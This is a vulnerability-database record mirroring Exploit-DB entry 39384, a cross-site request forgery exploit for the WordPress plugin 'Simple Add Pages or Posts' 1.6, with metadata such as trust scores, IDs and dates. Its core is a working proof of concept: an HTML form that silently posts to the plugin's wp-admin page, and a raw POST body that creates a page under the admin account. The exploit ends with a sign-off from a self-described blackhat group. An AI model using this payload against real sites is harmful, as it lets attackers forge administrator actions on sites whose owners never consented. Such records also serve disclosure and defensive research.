Sign-up

ID

VAR-E-201601-0194


EDB ID

39384


TITLE

WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 39384

DESCRIPTION

WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery.. webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 39384

AFFECTED PRODUCTS

vendor:wordpressmodel:plugin simple add pages or postsscope:eqversion:1.6

Trust: 1.0

vendor:wordpressmodel:simple add pages or posts pluginscope:eqversion:1.6

Trust: 0.6

sources: EXPLOIT-DB: 39384 // EDBNET: 60750

EXPLOIT

########################################################################
# Exploit Title: Wordpress simple add pages or posts CSRF Vulnerability
# Date: 2016/29/01
# Exploit Author: ALIREZA_PROMIS
# Vendor Homepage: https://wordpress.org/plugins/simple-add-pages-or-posts/
# Software Link: https://downloads.wordpress.org/plugin/simple-add-pages-or-posts.1.6.zip
# Version: 1.6
# Tested on: ubuntu / FireFox
########################################################################

[Exploitation]
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

[HTML CODE ]
<form id="form1" name="form1" method="post" action="http://site.com/wp-admin/plugins.php?page=simple-add-pages-or-posts%2Fsimple_add_pages_or_posts.php"
<select name="postorpage">
<option value="page">Page</option>
<option value="post">Post</option>
</select>
<td colspan="2"><select name='post_parent' id='post_parent'>
<option value="">No, do not use parent</option>
<option class="level-0" value="2">Sample Page</option>
</select>
<tr class="alternate iedit">
<textarea name="titles" rows="1" cols="30">&lt;/textarea&gt;
<tr class="iedit">
<td colspan="2"><select name="author_id">
<option value="1">admin</option></select>
<input type="submit" name="submitbutton" value="Add" class="button-primary"></form>

and live POST request :
postorpage=page&post_parent=2&titles=TEST_CSRF&author_id=1&submitbutton=Add

########################################################################
# Friends : ali ahmady , Mr.Moein , sheytan azzam , Mr.PERSIA , H3llBoy.Blackhat , Amir , Jok3r
# Sajjad Sotoudeh , security , Kamran Helish , Dr.RooT , Milad Inj3ctor , Mr.Turk
#
# [+] fb.com/alirezapomis.blackhat
########################################################################

Trust: 1.0

sources: EXPLOIT-DB: 39384

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 39384

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 39384

TYPE

Cross-Site Request Forgery

Trust: 1.0

sources: EXPLOIT-DB: 39384

TAGS

tag:WordPress Plugin

Trust: 1.0

sources: EXPLOIT-DB: 39384

CREDITS

ALIREZA_PROMIS

Trust: 0.6

sources: EXPLOIT-DB: 39384

EXTERNAL IDS

db:EXPLOIT-DBid:39384

Trust: 1.6

db:EDBNETid:60750

Trust: 0.6

sources: EXPLOIT-DB: 39384 // EDBNET: 60750

REFERENCES

url:https://www.exploit-db.com/exploits/39384/

Trust: 0.6

sources: EDBNET: 60750

SOURCES

db:EXPLOIT-DBid:39384
db:EDBNETid:60750

LAST UPDATE DATE

2022-07-27T09:49:33.420000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:39384date:2016-01-29T00:00:00
db:EDBNETid:60750date:2016-01-29T00:00:00